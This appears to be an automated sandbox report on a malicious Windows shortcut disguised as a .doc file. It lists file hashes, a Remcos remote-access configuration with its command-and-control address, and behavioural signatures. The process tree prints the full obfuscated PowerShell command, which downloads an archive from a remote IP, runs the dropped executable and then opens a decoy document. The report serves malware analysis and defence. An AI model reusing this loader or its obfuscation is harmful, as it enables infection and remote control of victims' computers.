Overview
overview
10Static
static
1brt_1_0147.doc.lnk
windows7-x64
3brt_1_0147.doc.lnk
windows10-2004-x64
10oshad_88.docx.lnk
windows7-x64
3oshad_88.docx.lnk
windows10-2004-x64
10rv_luti_20...sx.lnk
windows7-x64
3rv_luti_20...sx.lnk
windows10-2004-x64
10telegrama_...pg.lnk
windows7-x64
3telegrama_...pg.lnk
windows10-2004-x64
10Analysis
-
max time kernel
148s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
07-09-2024 01:16
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
brt_1_0147.doc.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
oshad_88.docx.lnk
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
oshad_88.docx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
telegrama_ksv_po_btgr.jpg.lnk
Resource
win7-20240903-en
General
-
Target
brt_1_0147.doc.lnk
-
Size
47KB
-
MD5
7f054fb90b37b4c6fa4ede910ee7425d
-
SHA1
f48454623fdb37da7797b43720e372926d6eca9d
-
SHA256
68fe63cdae0b90cd1df1d400879135d3c18522c98cf4a9473156b477a71529ce
-
SHA512
8f82f94ccba2034bec30a811de4cb04789dbbdfbe5a19479e65f6d58f5ab3e93717ecffb18a73a052b00b840bcd8beaa2f8c70bbd95a4e93c58bcea96bb32efb
-
SSDEEP
48:88muavUQSe9EGQwdfxvUZ7CFKxCI5BevUZ7vXRddCZZGXu/dZZIa7x:88y8MzdfxSxCIGuXRuqQ
Malware Config
Extracted
remcos
stalagg
5.181.156.117:8576
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-5TL39W
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 4492 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 2328 scr_previw.exe 4532 scr_previw.exe -
Loads dropped DLL 2 IoCs
pid Process 2328 scr_previw.exe 4532 scr_previw.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4532 set thread context of 4444 4532 scr_previw.exe 100 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language scr_previw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language scr_previw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3676 WINWORD.EXE 3676 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4492 powershell.exe 4492 powershell.exe 2328 scr_previw.exe 4532 scr_previw.exe 4532 scr_previw.exe 4444 cmd.exe 4444 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4532 scr_previw.exe 4444 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4492 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3676 WINWORD.EXE 3676 WINWORD.EXE 3676 WINWORD.EXE 3676 WINWORD.EXE 3676 WINWORD.EXE 3676 WINWORD.EXE 3676 WINWORD.EXE -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 5024 wrote to memory of 4492 5024 cmd.exe 84 PID 5024 wrote to memory of 4492 5024 cmd.exe 84 PID 4492 wrote to memory of 2328 4492 powershell.exe 97 PID 4492 wrote to memory of 2328 4492 powershell.exe 97 PID 4492 wrote to memory of 2328 4492 powershell.exe 97 PID 4492 wrote to memory of 3676 4492 powershell.exe 98 PID 4492 wrote to memory of 3676 4492 powershell.exe 98 PID 2328 wrote to memory of 4532 2328 scr_previw.exe 99 PID 2328 wrote to memory of 4532 2328 scr_previw.exe 99 PID 2328 wrote to memory of 4532 2328 scr_previw.exe 99 PID 4532 wrote to memory of 4444 4532 scr_previw.exe 100 PID 4532 wrote to memory of 4444 4532 scr_previw.exe 100 PID 4532 wrote to memory of 4444 4532 scr_previw.exe 100 PID 4532 wrote to memory of 4444 4532 scr_previw.exe 100 PID 4444 wrote to memory of 4120 4444 cmd.exe 106 PID 4444 wrote to memory of 4120 4444 cmd.exe 106 PID 4444 wrote to memory of 4120 4444 cmd.exe 106 PID 4444 wrote to memory of 4120 4444 cmd.exe 106 PID 4444 wrote to memory of 4120 4444 cmd.exe 106
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\brt_1_0147.doc.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo AndrfIhHlfnvKIhtnvYeqrAhmqLVwWJdoZlnqRyQvVyeaUwiaVcZTANG; echo zXMWRScaFTWIFOjLSXcfSRSTbmcsRQhjyNThYhe; echo OdjlPKboxgbXDOhZAdfzQBNtIOKUdvtxsMOxZfhUDhNKnBZGiU; if (-not(Test-Path 'glorytoukraine.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/glorytoukraine.zip -OutFile glorytoukraine.zip}; echo YALlpWtPrIfNILIjixMVhnRHZhqAGvmeJkeGerStfmUCITNZvaFP; Expand-Archive -Path glorytoukraine.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/scr_previw.exe; echo xQVQdHjoZNMewzivMdVmrBYIIbjxAEunTwzhWADkAGoxQpGNXpbRgtNoT; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/racs/brt_1_0147.doc -OutFile brt_1_0147.doc; echo sZXucWxIFfxCRlJoHaFxHVohDmYnMQgzycveSVaznWDmahqifS; s''t''a''rt brt_1_0147.doc2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exeC:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
PID:4120
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\brt_1_0147.doc" /o ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3676
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5e33dbe1a27e5aed39162450f4eab5888
SHA1683dcc810993c771f23fd0099e7c4a52b88f72be
SHA256242b9b4ef9cd4025ef210f0c236b7f148b7ea0ad461fa057f29591aff129d40b
SHA512c0b4f4a2b34a7021348f8d6f9ce333df5b1ce7501693f56b3813b897690c0df0d78a07ba03e29203a31e57b1f60050ddc616bf0bea6660a7c139d4b3f8e9ab4d
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
430B
MD52ee3c22d4d949302cf6dc5c24fec3cfa
SHA1ac3fe040762bbc5aaabca9d777071e3e456b3f8a
SHA2563ce344434c1248bc12041ee25a9e7fd399b05417ae598ec7f52a43f1a9ea7a89
SHA512a47e1b80184dbe3128682811be8c61f19b9f540705f5dea7e56d0e90dceec6708262977219f0de44ec11839ef06781f89ebe0e410d04a5cdd42ae9aa56b6e9c7
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize2KB
MD531a28aa9654a11f1bb741c409d3fe332
SHA1d55ce8e1937d83d7bad044fb7cd3692a9c9a17e5
SHA256367e52d501aff1ce86600504a702a24c30129699b03040407ec5c9555e30e4c8
SHA5125dd66b8b8805e0b8edb23b3a51d755541274820adb09028bd7c655a0c94660bb25f2cc4b715de18cac38587432142ee3ff8c70b92e373fa0a76f490d25fd3fa9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize1KB
MD5069f751fd8057d4c9cbb33b5d5753c85
SHA1c581760cfe4d6b1638adb86a5d2d07e9daeabaad
SHA256f6b36d61b96b50b160a149bb9aa78de73a03ce60d255f6b4e13222746ad917e3
SHA512c557191c00d5e83bc647429f5e0004c65ce125f0fe5b5320fcb4b484703eb365677e9d21a7787e5d9de7aa18f60692823501a19eb49f955cc00fccfbf40f69fd
-
Filesize
1.9MB
MD546e435aecb557fcb16ae2ea3b22ab7fd
SHA15290156599fd9575c4401c80949ad5672fe64da5
SHA25670e0b720bb461503acbd947a8355fb629d703b8d7f99ddfbb09a0c71886861da
SHA512621010aa44868062361c6dbb670f8664c370ddcb0afbb5835765470522c03bb5ac779e86236cfffdcf343cbc582f81beacd2a7108d78c90d4dfc4c38e7d23bb3
-
Filesize
1.0MB
MD5289d2d639e058b63ebe16bd8d543115d
SHA1969736e5f6a2c416f556e2f73358020573486afc
SHA256f21bf56c8d15824dc1cf4108725f73154b88a89ab23f00a7f8dbb2d2de8e2568
SHA5127adf83c9795d9705c4c1345422d17ad26b6d4f27a8242674f44b2d2a05080e532d9a64c43803164bf25c4e9eb5cac7a0d3789d71e9f34b46b5b9c6203fad65aa
-
Filesize
2.2MB
MD5d9530ecee42acccfd3871672a511bc9e
SHA189b4d2406f1294bd699ef231a4def5f495f12778
SHA25681e04f9a131534acc0e9de08718c062d3d74c80c7f168ec7e699cd4b2bd0f280
SHA512d5f048ea995affdf9893ec4c5ac5eb188b6714f5b6712e0b5a316702033421b145b8ee6a62d303eb4576bf8f57273ff35c5d675807563a31157136f79d8a9980
-
Filesize
80KB
MD5cae9827c507632c4a1980479c21a42a2
SHA1d9a1c5900a93066645bf8fb7c79dacf56f3eaa3e
SHA256efeec4c2f612130ec81f3796bba26471e14dcf97b0e22247b7c7f40ad2eba0cf
SHA512441fb631ed26bfe5b84c4fd267a43fbacc64e0adae0e90d0d8e11a248fa2ab47d43a54f1cc3903532943d158d87a2e236976830834545b0d13471731b6f61768
-
Filesize
47KB
MD52616f33bfc84fecd6496c0e3bfbfb1b0
SHA1e4f4fba392ba4a245415729a82aaa486ca31b2ba
SHA25624fbc1c09ca302ed51429082130f7789d36c254c0fb165dd96c3f24b458536a4
SHA512b5c585d7bbdce5e5c34447a311ccdb5b90e34cfd29671f2ebb05f01941e81ae7bcffbd42f5ed476e784684de70cb0fb67cedfd7e62c4c3b5cbe151fc6923dafb